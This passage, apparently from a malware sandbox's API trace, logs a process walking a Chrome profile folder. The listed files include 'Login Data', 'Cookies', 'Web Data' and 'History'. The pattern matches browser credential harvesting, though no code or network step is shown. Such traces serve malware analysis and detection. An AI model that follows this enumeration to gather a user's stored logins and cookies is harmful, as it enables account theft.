cFileName="Current Session", cAlternateFileName="CURREN~1")) returned 1 [0189.138] FindNextFileW (in: hFindFile=0xb7f190, lpFindFileData=0x949e914 | out: lpFindFileData=0x949e914*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x9c3b6860, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x9c3b6860, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x9c3b8f70, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x126, dwReserved0=0x0, dwReserved1=0x0, cFileName="Current Tabs", cAlternateFileName="CURREN~2")) returned 1 [0189.138] FindNextFileW (in: hFindFile=0xb7f190, lpFindFileData=0x949e914 | out: lpFindFileData=0x949e914*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x802d66a0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x80916060, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x80916060, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="data_reduction_proxy_leveldb", cAlternateFileName="DATA_R~1")) returned 1 [0189.138] FindNextFileW (in: hFindFile=0xb7f190, lpFindFileData=0x949e914 | out: lpFindFileData=0x949e914*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x82ad9940, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x82bed750, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x82bed750, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Extension Rules", cAlternateFileName="EXTENS~3")) returned 1 [0189.138] FindNextFileW (in: hFindFile=0xb7f190, lpFindFileData=0x949e914 | out: lpFindFileData=0x949e914*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x824ad030, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x82556720, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x82556720, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Extension State", cAlternateFileName="EXTENS~2")) returned 1 [0189.139] FindNextFileW (in: hFindFile=0xb7f190, lpFindFileData=0x949e914 | out: lpFindFileData=0x949e914*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x80d1a580, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x9174a630, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x9174a630, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Extensions", cAlternateFileName="EXTENS~1")) returned 1 [0189.139] FindNextFileW (in: hFindFile=0xb7f190, lpFindFileData=0x949e914 | out: lpFindFileData=0x949e914*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x80cce2c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x80cce2c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x80db2b00, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x5000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Favicons", cAlternateFileName="")) returned 1 [0189.139] FindNextFileW (in: hFindFile=0xb7f190, lpFindFileData=0x949e914 | out: lpFindFileData=0x949e914*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x80cce2c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x80cce2c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x80e97340, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Favicons-journal", cAlternateFileName="FAVICO~1")) returned 1 [0189.139] FindNextFileW (in: hFindFile=0xb7f190, lpFindFileData=0x949e914 | out: lpFindFileData=0x949e914*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x81c321d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x81c321d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x81c58330, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x2b2e9, dwReserved0=0x0, dwReserved1=0x0, cFileName="Google Profile.ico", cAlternateFileName="GOOGLE~1.ICO")) returned 1 [0189.139] FindNextFileW (in: hFindFile=0xb7f190, lpFindFileData=0x949e914 | out: lpFindFileData=0x949e914*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x802fc800, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x802fc800, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x87f47590, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x19000, dwReserved0=0x0, dwReserved1=0x0, cFileName="History", cAlternateFileName="")) returned 1 [0189.140] FindNextFileW (in: hFindFile=0xb7f190, lpFindFileData=0x949e914 | out: lpFindFileData=0x949e914*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x824d3190, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x824d3190, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x9c3b6860, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x142f, dwReserved0=0x0, dwReserved1=0x0, cFileName="History Provider Cache", cAlternateFileName="HISTOR~2")) returned 1 [0189.140] FindNextFileW (in: hFindFile=0xb7f190, lpFindFileData=0x949e914 | out: lpFindFileData=0x949e914*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x802fc800, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x802fc800, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x87f6d6f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="History-journal", cAlternateFileName="HISTOR~1")) returned 1 [0192.725] FindNextFileW (in: hFindFile=0xb7f190, lpFindFileData=0x949e914 | out: lpFindFileData=0x949e914*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x96ec4eb0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x96ec4eb0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x96ec4eb0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="JumpListIcons", cAlternateFileName="JUMPLI~2")) returned 1 [0192.725] FindNextFileW (in: hFindFile=0xb7f190, lpFindFileData=0x949e914 | out: lpFindFileData=0x949e914*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85096390, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85096390, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85096390, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="JumpListIconsOld", cAlternateFileName="JUMPLI~1")) returned 1 [0192.725] FindNextFileW (in: hFindFile=0xb7f190, lpFindFileData=0x949e914 | out: lpFindFileData=0x949e914*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8642cdf0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x8642cdf0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x8642cdf0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Local Extension Settings", cAlternateFileName="LOCALE~1")) returned 1 [0192.725] FindNextFileW (in: hFindFile=0xb7f190, lpFindFileData=0x949e914 | out: lpFindFileData=0x949e914*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x83ede170, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x90191d70, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x90191d70, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Local Storage", cAlternateFileName="LOCALS~1")) returned 1 [0192.725] FindNextFileW (in: hFindFile=0xb7f190, lpFindFileData=0x949e914 | out: lpFindFileData=0x949e914*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x80fc7e40, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x80fc7e40, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x8124f5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x4800, dwReserved0=0x0, dwReserved1=0x0, cFileName="Login Data", cAlternateFileName="LOGIND~1")) returned 1 [0192.725] FindNextFileW (in: hFindFile=0xb7f190, lpFindFileData=0x949e914 | out: lpFindFileData=0x949e914*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x80fc7e40, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x80fc7e40, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x8129b860, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Login Data-journal", cAlternateFileName="LOGIND~2")) returned 1 [0192.726] FindNextFileW (in: hFindFile=0xb7f190, lpFindFileData=0x949e914 | out: lpFindFileData=0x949e914*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x82330270, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x82330270, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x825f0410, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Network Action Predictor", cAlternateFileName="NETWOR~1")) returned 1 [0192.726] FindNextFileW (in: hFindFile=0xb7f190, lpFindFileData=0x949e914 | out: lpFindFileData=0x949e914*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x82330270, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x82330270, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x8262ad90, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Network Action Predictor-journal", cAlternateFileName="NETWOR~2")) returned 1 [0192.726] FindNextFileW (in: hFindFile=0xb7f190, lpFindFileData=0x949e914 | out: lpFindFileData=0x949e914*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x86263d70, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x86263d70, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86263d70, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x28, dwReserved0=0x0, dwReserved1=0x0, cFileName="Network Persistent State", cAlternateFileName="NETWOR~3")) returned 1 [0192.726] FindNextFileW (in: hFindFile=0xb7f190, lpFindFileData=0x949e914 | out: lpFindFileData=0x949e914*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x81d16a10, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x81d16a10, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x94034050, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x1400, dwReserved0=0x0, dwReserved1=0x0, cFileName="Origin Bound Certs", cAlternateFileName="ORIGIN~1")) returned 1 [0192.726] FindNextFileW (in: hFindFile=0xb7f190, lpFindFileData=0x949e914 | out: lpFindFileData=0x949e914*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x81d16a10, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x81d16a10, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x9405a1b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Origin Bound Certs-journal", cAlternateFileName="ORIGIN~2")) returned 1 [0192.726] FindNextFileW (in: hFindFile=0xb7f190, lpFindFileData=0x949e914 | out: lpFindFileData=0x949e914*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x859aa710, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x9c43f3e0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x9c446910, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x1a9d, dwReserved0=0x0, dwReserved1=0x0, cFileName="Preferences", cAlternateFileName="PREFER~1")) returned 1 [0192.726] FindNextFileW (in: hFindFile=0xb7f190, lpFindFileData=0x949e914 | out: lpFindFileData=0x949e914*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7f8dea80, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7f8dea80, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x8129b860, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x4000, dwReserved0=0x0, dwReserved1=0x0, cFileName="previews_opt_out.db", cAlternateFileName="PREVIE~1.DB")) returned 1 [0192.726] FindNextFileW (in: hFindFile=0xb7f190, lpFindFileData=0x949e914 | out: lpFindFileData=0x949e914*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x804795c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x804795c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x812c19c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="previews_opt_out.db-journal", cAlternateFileName="PREVIE~1.DB-")) returned 1 [0192.727] FindNextFileW (in: hFindFile=0xb7f190, lpFindFileData=0x949e914 | out: lpFindFileData=0x949e914*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8687f510, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x8687f510, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x869fc2d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="QuotaManager", cAlternateFileName="QUOTAM~1")) returned 1 [0192.727] FindNextFileW (in: hFindFile=0xb7f190, lpFindFileData=0x949e914 | out: lpFindFileData=0x949e914*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8687f510, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x8687f510, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86a48590, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="QuotaManager-journal", cAlternateFileName="QUOTAM~2")) returned 1 [0192.730] FindNextFileW (in: hFindFile=0xb7f190, lpFindFileData=0x949e914 | out: lpFindFileData=0x949e914*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7f846500, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7f846500, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7f846500, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb4, dwReserved0=0x0, dwReserved1=0x0, cFileName="README", cAlternateFileName="")) returned 1 [0192.730] FindNextFileW (in: hFindFile=0xb7f190, lpFindFileData=0x949e914 | out: lpFindFileData=0x949e914*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x857e1690, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x9c3f38f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x9c404a60, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x8b43, dwReserved0=0x0, dwReserved1=0x0, cFileName="Secure Preferences", cAlternateFileName="SECURE~1")) returned 1 [0192.731] FindNextFileW (in: hFindFile=0xb7f190, lpFindFileData=0x949e914 | out: lpFindFileData=0x949e914*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8218d350, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x8218d350, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x82271b90, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x3000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Shortcuts", cAlternateFileName="SHORTC~1")) returned 1 [0192.731] FindNextFileW (in: hFindFile=0xb7f190, lpFindFileData=0x949e914 | out: lpFindFileData=0x949e914*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8218d350, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x8218d350, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x822e3fb0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Shortcuts-journal", cAlternateFileName="SHORTC~2")) returned 1 [0192.731] FindNextFileW (in: hFindFile=0xb7f190, lpFindFileData=0x949e914 | out: lpFindFileData=0x949e914*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x84251e10, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x84251e10, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x84251e10, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Sync Extension Settings", cAlternateFileName="SYNCEX~1")) returned 1 [0192.731] FindNextFileW (in: hFindFile=0xb7f190, lpFindFileData=0x949e914 | out: lpFindFileData=0x949e914*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x80d66840, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x80d66840, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x8195e7b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x5000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Top Sites", cAlternateFileName="TOPSIT~1")) returned 1 [0192.731] FindNextFileW (in: hFindFile=0xb7f190, lpFindFileData=0x949e914 | out: lpFindFileData=0x949e914*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x80d8c9a0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x80d8c9a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x81984910, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Top Sites-journal", cAlternateFileName="TOPSIT~2")) returned 1 [0192.731] FindNextFileW (in: hFindFile=0xb7f190, lpFindFileData=0x949e914 | out: lpFindFileData=0x949e914*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x88c2e920, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x88c2e920, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x88c2e920, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x278, dwReserved0=0x0, dwReserved1=0x0, cFileName="TransportSecurity", cAlternateFileName="TRANSP~1")) returned 1 [0192.731] FindNextFileW (in: hFindFile=0xb7f190, lpFindFileData=0x949e914 | out: lpFindFileData=0x949e914*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x80ee3600, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x80ee3600, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x8c6cde50, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x20000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Visited Links", cAlternateFileName="VISITE~1")) returned 1 [0192.731] FindNextFileW (in: hFindFile=0xb7f190, lpFindFileData=0x949e914 | out: lpFindFileData=0x949e914*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x868593b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x868593b0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x868593b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Web Applications", cAlternateFileName="WEBAPP~1")) returned 1 [0192.732] FindNextFileW (in: hFindFile=0xb7f190, lpFindFileData=0x949e914 | out: lpFindFileData=0x949e914*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7f86c660, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7f86c660, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x82d370c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Web Data", cAlternateFileName="WEBDAT~1")) returned 1 [0192.732] FindNextFileW (in: hFindFile=0xb7f190, lpFindFileData=0x949e914 | out: lpFindFileData=0x949e914*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7f86c660, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7f86c660, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x82d608d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Web Data-journal", cAlternateFileName="WEBDAT~2")) returned 1 [0192.732] FindNextFileW (in: hFindFile=0xb7f190, lpFindFileData=0x949e914 | out: lpFindFileData=0x949e914*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0192.732] FindClose (in: hFindFile=0xb7f190 | out: hFindFile=0xb7f190) returned 1 [0192.732] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949eb9c) returned 1 [0192.732] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949eba8) returned 1 [0192.732] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949ebdc) returned 1 [0192.732] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default", nBufferLength=0x105, lpBuffer=0x949e6e4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default", lpFilePart=0x0) returned 0x4b [0192.733] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\", nBufferLength=0x105, lpBuffer=0x949e6b8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\", lpFilePart=0x0) returned 0x4c [0192.733] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\*", lpFindFileData=0x949e904 | out: lpFindFileData=0x949e904*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7f846500, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x9c4887c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x9c4887c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f190 [0192.733] FindNextFileW (in: hFindFile=0xb7f190, lpFindFileData=0x949e914 | out: lpFindFileData=0x949e914*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7f846500, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x9c4887c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x9c4887c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0192.734] FindNextFileW (in: hFindFile=0xb7f190, lpFindFileData=0x949e914 | out: lpFindFileData=0x949e914*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x805aa0c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x805aa0c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x805aa0c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Cache", cAlternateFileName="")) returned 1 [0192.734] FindNextFileW (in: hFindFile=0xb7f190, lpFindFileData=0x949e914 | out: lpFindFileData=0x949e914*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x80d406e0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x80d406e0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x98d1e730, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x1c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Cookies", cAlternateFileName="")) returned 1 [0192.734] FindNextFileW (in: hFindFile=0xb7f190, lpFindFileData=0x949e914 | out: lpFindFileData=0x949e914*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x80d66840, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x80d66840, 